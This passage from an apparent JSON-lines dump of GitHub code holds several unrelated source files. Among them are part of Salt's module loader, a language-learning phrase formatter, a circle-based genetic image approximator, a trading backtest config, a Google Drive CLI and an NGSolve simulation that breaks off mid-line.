\"grains.cache.p\")\n if not force_refresh and opts.get(\"grains_cache\", False):\n cached_grains = _load_cached_grains(opts, cfn)\n if cached_grains:\n return cached_grains\n else:\n log.debug(\"Grains refresh requested. Refreshing grains.\")\n\n if opts.get(\"skip_grains\", False):\n return {}\n grains_deep_merge = opts.get(\"grains_deep_merge\", False) is True\n if \"conf_file\" in opts:\n pre_opts = {}\n pre_opts.update(\n salt.config.load_config(\n opts[\"conf_file\"],\n \"SALT_MINION_CONFIG\",\n salt.config.DEFAULT_MINION_OPTS[\"conf_file\"],\n )\n )\n default_include = pre_opts.get(\"default_include\", opts[\"default_include\"])\n include = pre_opts.get(\"include\", [])\n pre_opts.update(\n salt.config.include_config(\n default_include, opts[\"conf_file\"], verbose=False\n )\n )\n pre_opts.update(\n salt.config.include_config(include, opts[\"conf_file\"], verbose=True)\n )\n if \"grains\" in pre_opts:\n opts[\"grains\"] = pre_opts[\"grains\"]\n else:\n opts[\"grains\"] = {}\n else:\n opts[\"grains\"] = {}\n\n grains_data = {}\n blist = opts.get(\"grains_blacklist\", [])\n funcs = grain_funcs(\n opts, proxy=proxy, context=context or {}, loaded_base_name=loaded_base_name\n )\n if force_refresh: # if we refresh, lets reload grain modules\n funcs.clear()\n # Run core grains\n for key in funcs:\n if not key.startswith(\"core.\"):\n continue\n log.trace(\"Loading %s grain\", key)\n ret = funcs[key]()\n if not isinstance(ret, dict):\n continue\n if blist:\n for key in list(ret):\n for block in blist:\n if salt.utils.stringutils.expr_match(key, block):\n del ret[key]\n log.trace(\"Filtering %s grain\", key)\n if not ret:\n continue\n if grains_deep_merge:\n salt.utils.dictupdate.update(grains_data, ret)\n else:\n grains_data.update(ret)\n\n # Run the rest of the grains\n for key in funcs:\n if key.startswith(\"core.\") or key == \"_errors\":\n continue\n try:\n # Grains are loaded too early to take advantage of the injected\n # __proxy__ variable. Pass an instance of that LazyLoader\n # here instead to grains functions if the grains functions take\n # one parameter. 
Then the grains can have access to the\n # proxymodule for retrieving information from the connected\n # device.\n log.trace(\"Loading %s grain\", key)\n parameters = inspect.signature(funcs[key]).parameters\n kwargs = {}\n if \"proxy\" in parameters:\n kwargs[\"proxy\"] = proxy\n if \"grains\" in parameters:\n kwargs[\"grains\"] = grains_data\n ret = funcs[key](**kwargs)\n except Exception: # pylint: disable=broad-except\n if salt.utils.platform.is_proxy():\n log.info(\n \"The following CRITICAL message may not be an error; the proxy may not be completely established yet.\"\n )\n log.critical(\n \"Failed to load grains defined in grain file %s in \"\n \"function %s, error:\\n\",\n key,\n funcs[key],\n exc_info=True,\n )\n continue\n if not isinstance(ret, dict):\n continue\n if blist:\n for key in list(ret):\n for block in blist:\n if salt.utils.stringutils.expr_match(key, block):\n del ret[key]\n log.trace(\"Filtering %s grain\", key)\n if not ret:\n continue\n if grains_deep_merge:\n salt.utils.dictupdate.update(grains_data, ret)\n else:\n grains_data.update(ret)\n\n if opts.get(\"proxy_merge_grains_in_module\", True) and proxy:\n try:\n proxytype = proxy.opts[\"proxy\"][\"proxytype\"]\n if proxytype + \".grains\" in proxy:\n if (\n proxytype + \".initialized\" in proxy\n and proxy[proxytype + \".initialized\"]()\n ):\n try:\n proxytype = proxy.opts[\"proxy\"][\"proxytype\"]\n ret = proxy[proxytype + \".grains\"]()\n if grains_deep_merge:\n salt.utils.dictupdate.update(grains_data, ret)\n else:\n grains_data.update(ret)\n except Exception: # pylint: disable=broad-except\n log.critical(\n \"Failed to run proxy's grains function!\", exc_info=True\n )\n except KeyError:\n pass\n\n grains_data.update(opts[\"grains\"])\n # Write cache if enabled\n if opts.get(\"grains_cache\", False):\n with salt.utils.files.set_umask(0o077):\n try:\n if salt.utils.platform.is_windows():\n # Late import\n import salt.modules.cmdmod\n\n # Make sure cache file isn't read-only\n salt.modules.cmdmod._run_quiet(f'attrib -R \"{cfn}\"')\n with salt.utils.files.fopen(cfn, \"w+b\") as fp_:\n try:\n salt.payload.dump(grains_data, fp_)\n except TypeError as e:\n log.error(\"Failed to serialize grains cache: %s\", e)\n raise # re-throw for cleanup\n except Exception as e: # pylint: disable=broad-except\n log.error(\"Unable to write to grains cache file %s: %s\", cfn, e)\n # Based on the original exception, the file may or may not have been\n # created. If it was, we will remove it now, as the exception means\n # the serialized data is not to be trusted, no matter what the\n # exception is.\n if os.path.isfile(cfn):\n os.unlink(cfn)\n\n if grains_deep_merge:\n salt.utils.dictupdate.update(grains_data, opts[\"grains\"])\n else:\n grains_data.update(opts[\"grains\"])\n return salt.utils.data.decode(grains_data, preserve_tuples=True)\n\n\n# TODO: get rid of? Does anyone use this? 
You should use raw() instead\ndef call(fun, **kwargs):\n \"\"\"\n Directly call a function inside a loader directory\n \"\"\"\n args = kwargs.get(\"args\", [])\n dirs = kwargs.get(\"dirs\", [])\n loaded_base_name = kwargs.pop(\"loaded_base_name\", None)\n\n funcs = LazyLoader(\n [str(SALT_BASE_PATH / \"modules\")] + dirs,\n None,\n tag=\"modules\",\n virtual_enable=False,\n loaded_base_name=loaded_base_name,\n )\n return funcs[fun](*args)\n\n\ndef runner(opts, utils=None, context=None, whitelist=None, loaded_base_name=None):\n \"\"\"\n Directly call a function inside a loader directory\n\n :param dict opts: The Salt options dictionary\n :param list whitelist: A list of modules which should be whitelisted.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if utils is None:\n utils = {}\n if context is None:\n context = {}\n return LazyLoader(\n _module_dirs(opts, \"runners\", \"runner\", ext_type_dirs=\"runner_dirs\"),\n opts,\n tag=\"runners\",\n pack={\"__utils__\": utils, \"__context__\": context},\n whitelist=whitelist,\n extra_module_dirs=utils.module_dirs if utils else None,\n # TODO: change from __salt__ to something else, we overload __salt__ too much\n pack_self=\"__salt__\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef queues(opts, loaded_base_name=None):\n \"\"\"\n Directly call a function inside a loader directory\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"queues\", \"queue\", ext_type_dirs=\"queue_dirs\"),\n opts,\n tag=\"queues\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef sdb(opts, functions=None, whitelist=None, utils=None, loaded_base_name=None):\n \"\"\"\n Make a very small database call\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param list whitelist: A list of modules which should be whitelisted.\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if utils is None:\n utils = {}\n\n return LazyLoader(\n _module_dirs(opts, \"sdb\"),\n opts,\n tag=\"sdb\",\n pack={\n \"__sdb__\": functions,\n \"__utils__\": utils,\n \"__salt__\": minion_mods(opts, utils=utils),\n },\n whitelist=whitelist,\n extra_module_dirs=utils.module_dirs if utils else None,\n loaded_base_name=loaded_base_name,\n )\n\n\ndef pkgdb(opts, loaded_base_name=None):\n \"\"\"\n Return modules for SPM's package database\n\n .. versionadded:: 2015.8.0\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"pkgdb\", base_path=str(SALT_BASE_PATH / \"spm\")),\n opts,\n tag=\"pkgdb\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef pkgfiles(opts, loaded_base_name=None):\n \"\"\"\n Return modules for SPM's file handling\n\n .. 
versionadded:: 2015.8.0\n\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"pkgfiles\", base_path=str(SALT_BASE_PATH / \"spm\")),\n opts,\n tag=\"pkgfiles\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef clouds(opts, loaded_base_name=None):\n \"\"\"\n Return the cloud functions\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n _utils = utils(opts)\n # Let's bring __active_provider_name__, defaulting to None, to all cloud\n # drivers. This will get temporarily updated/overridden with a context\n # manager when needed.\n functions = LazyLoader(\n _module_dirs(\n opts,\n \"clouds\",\n \"cloud\",\n base_path=str(SALT_BASE_PATH / \"cloud\"),\n int_type=\"clouds\",\n ),\n opts,\n tag=\"clouds\",\n pack={\"__utils__\": _utils, \"__active_provider_name__\": None},\n extra_module_dirs=_utils.module_dirs,\n loaded_base_name=loaded_base_name,\n )\n for funcname in LIBCLOUD_FUNCS_NOT_SUPPORTED:\n log.trace(\n \"'%s' has been marked as not supported. Removing from the \"\n \"list of supported cloud functions\",\n funcname,\n )\n functions.pop(funcname, None)\n return functions\n\n\ndef netapi(opts, loaded_base_name=None):\n \"\"\"\n Return the network api functions\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"netapi\"),\n opts,\n tag=\"netapi\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef executors(opts, functions=None, context=None, proxy=None, loaded_base_name=None):\n \"\"\"\n Returns the executor modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if proxy is None:\n proxy = {}\n if context is None:\n context = {}\n return LazyLoader(\n _module_dirs(opts, \"executors\", \"executor\"),\n opts,\n tag=\"executor\",\n pack={\"__salt__\": functions, \"__context__\": context, \"__proxy__\": proxy},\n pack_self=\"__executors__\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef cache(opts, loaded_base_name=None):\n \"\"\"\n Returns the returner modules\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"cache\", \"cache\"),\n opts,\n tag=\"cache\",\n loaded_base_name=loaded_base_name,\n )\n\n\n@contextlib.contextmanager\ndef catch_entry_points_exception(entry_point):\n context = types.SimpleNamespace(exception_caught=False)\n try:\n yield context\n except Exception as exc: # pylint: disable=broad-except\n context.exception_caught = True\n entry_point_details = entrypoints.name_and_version_from_entry_point(entry_point)\n log.error(\n \"Error processing Salt Extension %s(version: %s): %s\",\n entry_point_details.name,\n entry_point_details.version,\n exc,\n exc_info_on_loglevel=logging.DEBUG,\n 
)\n","repo_name":"saltstack/salt","sub_path":"salt/loader/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":51396,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"13974476794","text":"import tempfile\n\nfrom .translator import JishoTranslator, GoogleTranslator, Translator\nfrom .splitter import Splitter, JapaneseSplitter, WhiteSpaceSplitter\nfrom gtts import gTTS\nfrom os.path import join\nfrom abc import ABC, abstractmethod\nfrom dataclasses import dataclass, field\n\n\n@dataclass\nclass PhraseFormatter(ABC):\n translator: Translator\n splitter: Splitter\n _temp_dir: str = field(init=False, repr=False, default='')\n\n @property\n def temp_dir(self) -> str:\n return self._temp_dir\n\n @abstractmethod\n def format(self, word) -> str:\n raise NotImplementedError()\n\n def process_phrase(self, phrase, tts_dir) -> str:\n output = ''\n for word in self.splitter.split(phrase):\n output += self.format(word)\n output += '\\n'\n gTTS(text=phrase, lang=self.translator.from_lang, slow=False).save(join(tts_dir, f'{phrase}.mp3'))\n output += GoogleTranslator(self.translator.from_lang, self.translator.to_lang).translate(phrase)\n return output\n\n def run(self, text: str):\n with tempfile.TemporaryDirectory() as tmp_dir:\n self._temp_dir = tmp_dir\n for phrase in Splitter.split_phrases(text):\n yield phrase, self.process_phrase(phrase, tmp_dir)\n\n def run_file(self, input_file):\n with open(input_file) as fd:\n for processed_phrase in self.run(fd.read()):\n yield processed_phrase\n\n\n@dataclass\nclass JapanesePhraseFormatter(PhraseFormatter):\n translator: Translator = JishoTranslator()\n splitter: Splitter = JapaneseSplitter()\n\n def format(self, word: dict) -> str:\n head_formatting = word['orig'] if word['orig'] == word['hira'] else f\"{word['orig']} ({word['hira']})\"\n tail_formatting = self.translator.translate(word['orig'])\n return f\"{head_formatting} = {tail_formatting}\\n\"\n\n\n@dataclass\nclass LanguagePhraseFormatter(PhraseFormatter):\n translator: Translator\n splitter: Splitter = WhiteSpaceSplitter()\n\n cache = {}\n\n def format(self, word: str) -> str:\n if word not in self.cache:\n self.cache[word] = self.translator.translate(word)\n return f'{word} = {self.cache[word]}\\n'\n","repo_name":"ramonhpr/sentence-split-anki-plugin","sub_path":"packages/phrase_formatter.py","file_name":"phrase_formatter.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39558020320","text":"from PIL import Image\nfrom random import randint,random\nimport math\n\nCIRCLE_COUNT = 2\nRADIUS_MIN = 30\nRADIUS_MAX = 32\nPOPULATION_SIZE = 6\nPXOVER = 1\nPMUTATE = 0.5\nROUNDS = 1000\nPOPULATION = []\nNEW_POPULATION = []\nNUM_MUTATIONS = 6\n\ndef black_and_white_dithering(input_image_path,\n output_image_path):\n color_image = Image.open(input_image_path)\n bw = color_image.convert('1',dither=Image.NONE)\n bw.save(output_image_path)\n return bw;\n \ndef get_matrix(input_image):\n im = black_and_white_dithering(\n input_image,\n 'bw.png')\n pixels = list(im.getdata())\n\n width, height = im.size\n print(\"{} x {}\".format(width,height))\n mat = []\n mat_row = []\n for i in range(len(pixels)):\n if (i and i%width == 0):\n mat.append(mat_row)\n mat_row = []\n mat_row.append(1 if pixels[i] else 0)\n mat.append(mat_row)\n return mat, width, height\n\nclass Circle:\n \n def __init__(self,width,height,clone=None):\n self.width = 
width\n self.height = height\n \n if clone:\n self.radius = clone.radius\n self.x = clone.x\n self.y = clone.y\n self.color = clone.color\n else:\n self.rand_init()\n \n def rand_init(self):\n self.radius = randint(RADIUS_MIN,RADIUS_MAX)\n self.x = randint(1,self.width)\n self.y = randint(1,self.height)\n # self.color = randint(0,1)\n self.color = 0\n self.radius*=self.radius\n\n def get_color(self,xd,yd):\n rx = xd - self.x;\n ry = yd - self.y;\n if ((rx*rx)+(ry*ry)) <= self.radius:\n return self.color\n return -1\n\n def mutate(self):\n self.rand_init()\n self.radius*=self.radius\n\nclass GenoType:\n def __init__(self,width,height,result,clone=False):\n self.circles = []\n self.img = None\n self.width = width\n self.height = height\n self.fitness = -1\n if clone == False:\n for _ in range(CIRCLE_COUNT):\n self.circles.append(Circle(width,height))\n self.result = result\n \n def __eq__(self, other):\n return self.get_fitness() == other.get_fitness();\n\n def __hash__(self):\n return hash(self.get_fitness())\n\n def get_clone(self):\n clone = GenoType(self.width,self.height,self.result,clone=True)\n for circle in self.circles:\n clone.circles.append(Circle(self.width,self.height,circle))\n\n return clone\n\n def compute_img(self):\n img = []\n for x in range(self.width):\n img_row = []\n for y in range(self.height):\n color_count = [0,0]\n for circle in self.circles:\n t = circle.get_color(x,y)\n if t>=0:\n color_count[t]+=1\n img_row.append(0 if color_count[0] > color_count[1] else 1)\n img.append(img_row)\n self.img = img\n\n def store(self,recompute=False,id=1):\n if recompute:\n self.compute_img()\n data = []\n for x in range(self.width):\n for y in range(self.height):\n data.append(255 if self.img[x][y] else 0)\n \n img = Image.new('1', (self.height,self.width))\n img.putdata(data)\n # img.save('{}.png'.format(id))\n img.show()\n\n def get_fitness(self):\n if self.fitness != -1:\n return self.fitness\n self.compute_img()\n fitness = 0\n for x in range(self.width):\n for y in range(self.height):\n if self.result[x][y] == self.img[x][y]:\n fitness+=1\n self.fitness = fitness\n return fitness\n\n def mutate(self):\n invalidate = False\n for circle in self.circles:\n if random() < PMUTATE:\n invalidate = True\n circle.mutate()\n if invalidate:\n self.fitness = -1\n\ndef x_over(A,B):\n A.fitness = -1\n B.fitness = -1\n x_point = randint(1,CIRCLE_COUNT-1)\n for i in range(x_point):\n tmp = A.circles[i]\n A.circles[i] = B.circles[i]\n B.circles[i] = tmp\n\n\ndef init_population(file_name):\n mat,width,height = get_matrix(file_name)\n for i in range(POPULATION_SIZE):\n POPULATION.append(GenoType(height,width,mat));\n\ndef clone_population():\n for gene in POPULATION:\n NEW_POPULATION.append(gene.get_clone())\n\ndef mutate_population():\n for _ in range(NUM_MUTATIONS):\n i = randint(0,POPULATION_SIZE - 1)\n NEW_POPULATION[i].mutate()\n\ndef do_x_over():\n ctr = 0\n one = -1\n\n for i in range(POPULATION_SIZE):\n if random() < PXOVER:\n ctr+=1\n if ctr%2:\n one = i\n else:\n x_over(NEW_POPULATION[one],NEW_POPULATION[i])\n\n\ndef store_population(just_print=False):\n for i in range(POPULATION_SIZE):\n POPULATION[i].get_fitness()\n if just_print == False:\n POPULATION[i].store(id=i)\n\ndef get_unique(p,np):\n x = set()\n for item in p+np:\n x.add(item)\n return [item for item in x]\n\nif __name__ == '__main__':\n x = set()\n init_population(\"japu.png\")\n for gene in POPULATION:\n gene.get_fitness()\n store_population()\n for r_count in range(ROUNDS):\n clone_population()\n do_x_over()\n 
mutate_population()\n TOTALITY = get_unique(POPULATION,NEW_POPULATION)\n TOTALITY = [gene for gene in sorted(TOTALITY,key = lambda t: t.get_fitness())]\n half = int(POPULATION_SIZE/2)\n POPULATION = TOTALITY[len(TOTALITY) - POPULATION_SIZE : len(TOTALITY)]\n store_population(just_print=True)\n # print(\"done with round\",r_count)\n store_population()\n","repo_name":"earthshakira/road-to-2k","sub_path":"chill/gray.py","file_name":"gray.py","file_ext":"py","file_size_in_byte":5774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33099537376","text":"import backtrader as bt\nfrom strategies.SMACrossoverMulti import SMACrossoverMulti\nimport numpy as np\nfrom comissions.comissions import StocksFixed\n\ndef getConfig():\n\n walkforward_input = {\n 'strategy': SMACrossoverMulti,\n # 'strategy': PercentFollower,\n 'datapath': 'C:\\\\ProgramData\\\\Kibot Agent\\\\Data\\\\30m\\\\',\n # 'datapath': 'C:\\\\TickDownloader\\\\tickdata\\\\',\n 'outputpath': 'results\\\\',\n 'start_date': '2006/01/01',\n 'end_date': '2017/01/01',\n 'n_splits': 2,\n # 'tickers': [['EURUSD','D1','UTC-5','00'],\n # ['GBPUSD', 'D1', 'UTC-5', '00']],\n 'tickers': [['EBAY'], ['AAPL'], ['JNJ']],\n 'extension': 'txt',\n # 'extension': 'csv',\n 'optimization_input': {\n # 'fast': 14,\n # 'slow': 200,\n 'perc_change': np.arange(0.01, 0.1, 0.01),\n 'before_period': 2,\n 'after_period': 1,\n 'trading_start': np.arange(9, 12, 0.5),\n 'trading_length': 8,\n 'filter_off': False,\n 'stop_loss_on': True,\n 'stop_loss': np.arange(0.01, 0.06, 0.01),\n 'printlog': False},\n 'broker_input': {\n 'stdstats': False,\n 'opreturn': False,\n 'cash': 20000,\n 'slippage_perc': 0.001,\n 'comission': StocksFixed,\n 'commvalue': 5,\n 'sizer': bt.sizers.PercentSizer,\n 'percents': 30\n }\n }\n","repo_name":"emindeniz/exterme_bt","sub_path":"configs/PercentFollowerConfig.py","file_name":"PercentFollowerConfig.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"34416184776","text":"# -*- coding: utf-8 -*-\n\"\"\"Este modulo contiene utilidades varias.\"\"\"\n\n\ndef format_json_key(key, value):\n \"\"\"Formatea una clave y un valor en formato JSON.\"\"\"\n if value.lower() not in [\"true\", \"false\"]:\n return '\"%s\": \"%s\"' % (key, value)\n else:\n return '\"%s\": %s' % (key, value)\n\n\ndef format_json(the_list):\n \"\"\"Formatea una lista de claves y valores en un diccionario JSON.\"\"\"\n result = \"{\"\n index = 0\n size = len(the_list)\n while index < size:\n result += format_json_key(the_list[index][0], the_list[index][1])\n if index != size - 1:\n result += \", \"\n index += 1\n result += \"}\"\n return result\n","repo_name":"AnderRasoVazquez/pybox","sub_path":"pybox/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35310063844","text":"states_needed = set([\"mt\",\"wa\",\"or\",\"id\",\"nv\",\"ut\",\"ca\",\"az\"])\nstations = {}\nstations[\"kone\"] = set([\"id\",\"nv\",\"ut\"])\nstations[\"ktwo\"] = set([\"wa\",\"id\",\"mt\"])\nstations[\"kthree\"] = set([\"or\",\"nv\",\"ca\"])\nstations[\"kfour\"] = set([\"nv\",\"ut\"])\nstations[\"kfive\"] = set([\"ca\",\"az\"])\ni = 0\nprint(len(states_needed))\nfinal_station = set()\nwhile states_needed: #这种就可以直接表示集合为空则停止循环\n best_station = None\n states_covered = set() #包含该广播台覆盖的所有未覆盖的洲\n for station, 
states_for_station in stations.items():\n covered = states_needed & states_for_station\n ##计算交集\n if len(covered) > len(states_covered):\n best_station = station\n states_covered = covered\n ##这个没法停下来\n states_needed -= states_covered\n final_station.add(best_station)\n\nprint(final_station)","repo_name":"enigma-seeking/learn","sub_path":"greed.py","file_name":"greed.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30437005042","text":"#!/usr/bin/env python\n\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nimport json\nimport os\nimport click\n\n@click.group()\ndef cli():\n\t\"\"\"GDrive Management\"\"\"\n\n\ngauth = GoogleAuth()\ngauth.LocalWebserverAuth()\ndrive = GoogleDrive(gauth)\n\naccess_token = json.loads(open('gdriveauth').read())\naccess_token = access_token['access_token']\n\n\ndef list_file(folder_id='root', max_files=100000, output_file=None):\n\tcommand = \"./google-drive --access-token %s list -q '\\\"%s\\\" in parents and trashed=False' -m %d\" % (access_token, folder_id, max_files)\n\t\n\tif output_file:\n\t\tstdout = os.popen(command).read()\n\t\toutput_file = open(output_file, 'w')\n\n\t\toutput_file.write(stdout)\n\t\toutput_file.close()\n\telse:\n\t\tos.system(command)\n\n\n@cli.command()\n@click.option('--id', help='ID of the parent directory')\n@click.option('--url', help='URL of the parent directory')\n@click.option('-m', '--mx' , type=int, default=100000, help='Max number of files')\n@click.option('-o', '--output-file', help='Output the list in a file')\ndef list(id, url, mx, output_file):\n\tif id and not url:\n\t\tlist_file(id, mx, output_file)\n\telif not id and url:\n\t\tif url.find('id=') != -1:\n\t\t\tindex = url.find('id=')+3\n\t\t\tid = url[index:]\n\t\telse:\n\t\t\tif url.find('?usp=sharing') != -1:\n\t\t\t\turl = url[:-12]\n\t\t\tid = url.split('/')\n\t\t\tid = id[-1]\n\t\tlist_file(id, mx, output_file)\n\telif not id and not url:\n\t\tlist_file()\n\n\n@cli.command()\n@click.option('--id', help='ID of the file to download')\n@click.option('-f', '--file', help='Specify file to read info regarding download')\n@click.option('-o', '--output-file', default='output/', help='Path to the directory where to save the file, default = ./output/*')\ndef download(id, file, output_file):\n\tto_download = []\n\n\tif file:\n\t\twith open(file) as inp_file:\n\t\t\tfile_infos = inp_file.readlines()\n\n\t\t\tfor line in file_infos:\n\t\t\t\twords = line.split()\n\n\t\t\t\tif words[0] != 'Id':\n\t\t\t\t\tto_download.append(words[0])\n\tif id:\n\t\tto_download.append(id)\n\n\tfor id in to_download:\n\t\tos.system('./google-drive --access-token %s download --path %s -f -r %s' % (access_token, output_file, id))\n\n\nif __name__ == \"__main__\":\n\tcli()","repo_name":"raihatneloy/GDrive-Script","sub_path":"gdrive.py","file_name":"gdrive.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2711742695","text":"from ngsolve import *\nfrom netgen.geom2d import SplineGeometry, unit_square\nfrom ngsapps.utils import *\nimport settings\nimport pickle\n\n# FIXME: AnnulusSpeedCF Dx, Dy do not respect smear\n\norder = 3\nmaxh = 7\n\nvtkoutput = False\n\n# time step and end\n# tau = 0.01\n# tau = 0.5\ntau = 5\ntend = -1\n\n# diffusion coefficient for rho\nDT = 0.004\n\n# determines how quickly the average local swim speed\n# decreases with the 
density\nalpha = 0.38\n\n# positive parameters which ensure that, at steady state\n# and in the absence of any density or velocity gradients,\n# W vanishes everywhere\ngamma1 = 0.1\ngamma2 = 0.5\n\n# effective diffusion coefficent for W\n# ensures continuity of this field\n# k = 0.1\nk = 2\n\n# self-advection\nw1 = 0\n# active pressure, >0\nw2 = 30\n\nmesh, v, vdx, vdy = settings.annulusInPeriodicSquare(order, maxh)\n# mesh, v, vdx, vdy = settings.annulus(order, maxh)\n# mesh, v, vdx, vdy = settings.singleSawtooth(order, 2)\n\ngradv = CoefficientFunction((vdx, vdy))\n\nfesRho = Periodic(H1(mesh, order=order))\nfesW = Periodic(H1(mesh, order=order-1))\nfes = FESpace([fesRho, fesW, fesW])\n\nrho, Wx, Wy = fes.TrialFunction()\ntrho, tWx, tWy = fes.TestFunction()\n\nW = CoefficientFunction((Wx, Wy))\nWxdx = grad(Wx)[0]\nWxdy = grad(Wx)[1]\nWydx = grad(Wy)[0]\nWydy = grad(Wy)[1]\ndivW = Wxdx + Wydy\ngradWx = CoefficientFunction((Wxdx, Wxdy))\ngradWy = CoefficientFunction((Wydx, Wydy))\n\ntW = CoefficientFunction((tWx, tWy))\ntWxdx = grad(tWx)[0]\ntWxdy = grad(tWx)[1]\ntWydx = grad(tWy)[0]\ntWydy = grad(tWy)[1]\ndivtW = tWxdx + tWydy\ngradtWx = CoefficientFunction((tWxdx, tWxdy))\ngradtWy = CoefficientFunction((tWydx, tWydy))\n\ng = GridFunction(fes)\ngrho, gWx, gWy = g.components\ngW = CoefficientFunction((gWx, gWy))\nvbar = v * exp(-alpha*grho)\ngradvbar = gradv*exp(-alpha*grho) - alpha*grad(grho)*vbar\nWdotdelW = CoefficientFunction((gW*gradWx, gW*gradWy))\ngradnormWsq = 2*gWx*gradWx + 2*gWy*gradWy\n\n# initial values\n# grho.Set(exp(-sqr(x)-sqr(y)))\n# measure = Integrate(CoefficientFunction(1), mesh)\n# grho.Set(CoefficientFunction(1/measure))\ngrho.Set(CoefficientFunction(1))\n# grho.Set(CoefficientFunction(0.01))\ngWx.Set(CoefficientFunction(0))\ngWy.Set(CoefficientFunction(0))\n\na = BilinearForm(fes)\n\n# equation for rho\n# TODO: boundary terms from partial integration?\n# TODO: separate terms which need to be reassembled at every time step\na += SymbolicBFI(vbar*W*grad(trho) - DT*grad(rho)*grad(trho))\n# a += SymbolicBFI((vbar*W*grad(trho) - DT*grad(rho)*grad(trho)).Compile(True))\n# a += SymbolicBFI(-gradvbar*W*trho - vbar*divW*trho - DT*grad(rho)*grad(trho))\n\n# # equation for W\na += SymbolicBFI(0.5*vbar*rho*divtW - gamma1*W*tW\n -gamma2*(sqr(gWx)+sqr(gWy))*W*tW - k*divW*divtW\n -w1*WdotdelW*tW + w2*gradnormWsq*tW)\n# a += SymbolicBFI((0.5*vbar*rho*divtW - gamma1*W*tW\n# -gamma2*(sqr(gWx)+sqr(gWy))*W*tW - k*divW*divtW\n# -w1*WdotdelW*tW + w2*gradnormWsq*tW).Compile(True))\n# a += SymbolicBFI(-0.5*(gradvbar*rho + vbar*grad(rho))*tW - gamma1*W*tW\n# -gamma2*(sqr(gWx)+sqr(gWy))*W*tW - k*gradWx*gradtWx - k*gradWy*gradtWy\n# -w1*WdotdelW*tW + w2*gradnormWsq*tW)\n\nm = BilinearForm(fes)\nm += SymbolicBFI(rho*trho + W*tW)\n\nm.Assemble()\n\nrhs = g.vec.CreateVector()\nmstar = m.mat.CreateMatrix()\n\n# pickin = pickle.Unpickler(open('sawtooth2d_8.dat', 'rb'))\n# pickout = pickle.Pickler(open('sawtooth2d_9.dat', 'wb'))\n# while True:\n# try:\n# g.vec.FV().NumPy()[:] = pickin.load().tolist()\n# except EOFError:\n# break\n\n# # # g.vec.data = gp.vec\n# # # print(g.components[0].vec)\n# for i in range(len(g.vec)):\n# g.vec[i] = gp[i]\n# # print(g.vec[i])\n# # # print(g.vec)\n\nDraw(vdy, mesh, 'vdy')\nDraw(vdx, mesh, 'vdx')\nDraw(v, mesh, 'v')\nDraw(gW, mesh, 'W')\nDraw(vbar*gW-DT*grad(grho), mesh,'J')\nDraw(grho, mesh, 'rho')\n\nif vtkoutput:\n vtk = MyVTKOutput(ma=mesh, coefs=[g.components[0], g.components[1], g.components[2]],names=[\"rho\", \"Wx\", \"Wy\"], 
